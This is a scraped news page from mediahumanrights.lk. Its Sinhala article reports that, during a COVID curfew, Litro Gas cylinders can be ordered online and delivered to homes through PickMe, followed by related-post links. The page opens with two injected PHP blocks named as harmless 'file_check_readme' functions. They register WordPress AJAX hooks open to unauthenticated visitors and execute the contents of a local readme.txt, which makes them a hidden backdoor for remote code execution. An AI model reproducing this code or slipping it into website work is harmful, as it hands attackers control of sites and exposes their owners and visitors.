if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඇදිරි නීතිය අදාලම නෑ… PickMe මගින් LithroGas ගෙදරටම… මෙන්න ක‍්‍රමය.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

ඇදිරි නීතිය අදාලම නෑ… PickMe මගින් LithroGas ගෙදරටම… මෙන්න ක‍්‍රමය..

අත්‍යවශ්‍ය සේවා යටතේ ලිට්රෝ ගෑස් අන්තර්ජාලය භාවිත කර PickMe කුලී රථ සේවාව මගින් නිවසටම ගෙන්වා ගැනීම සදහා වැඩපිලිවෙලක් ආරම්භ කර ඇත.

කොරෝනා වෛරස පාලනය කිරීම සඳහා රජය විසින් ජනතා සුභ සිද්ධිය සඳහා බස්නාහිර ඇතුළු පළාත් කිහිපයක අදත් ඇඳිරි නීතිය ක්‍රියාත්මකය.

එනිසා ජන ජීවිතයේ එදිනෙදා අත්‍යවශ්‍ය භාණ්ඩ බෙදා හැරීමේ නව ක්‍රමවේද රජය මගින් ක්‍රියාත්මක කරයි.

ඒ අනුව රජය සතු ලිට්රෝ ලංකා ගෑස් සමාගම අන්තර්ජාලය හරහා ලිත්‍රො ගෑස් සිලින්ඩරයක් නිවසටම ගෙන්වා ගැනීමේ නව ක්‍රම වේදයක් ඊයේ සිට ආරම්භ කරන ලදී.

ඒ අනුව තමන්ගේ ජංගම දුරකථනය මගින් මුදලට හෝ ක්‍රෙඩිට් කාඩ් මගින් මුදල් ගෙවා තම නිවෙසට ම ගෑස් සිලින්ඩරයක් ගෙන්වා ගැනීමට අවශ්‍ය පහසුකම් ලැබී ඇත.

දැනට බස්නාහිර පළාත තුළ මෙම ක්‍රමය ක්‍රියාත්මක වේ.

යොමුව මෙතනින්
(under the courtesy of lankacnews.com news web)

Related posts

ඩොලර් නෑ.. ඇපල්, දොඩම්, මිදි, චොකලට් ආනයන නවතයි..

Shiran Viraj

තවත් ආසාදිතයින් 14ක්-සමස්ත ආසාදිතයින් ගණන 233 දක්වා වැඩි වෙයි

Shiran Viraj

පොහොට්ටුවේ ඇඩ් හදන උන්ට හෙණ ගහපන්..- මංගල පාර්ලිමේන්තුවේ පලි ගහයි…

Shiran Viraj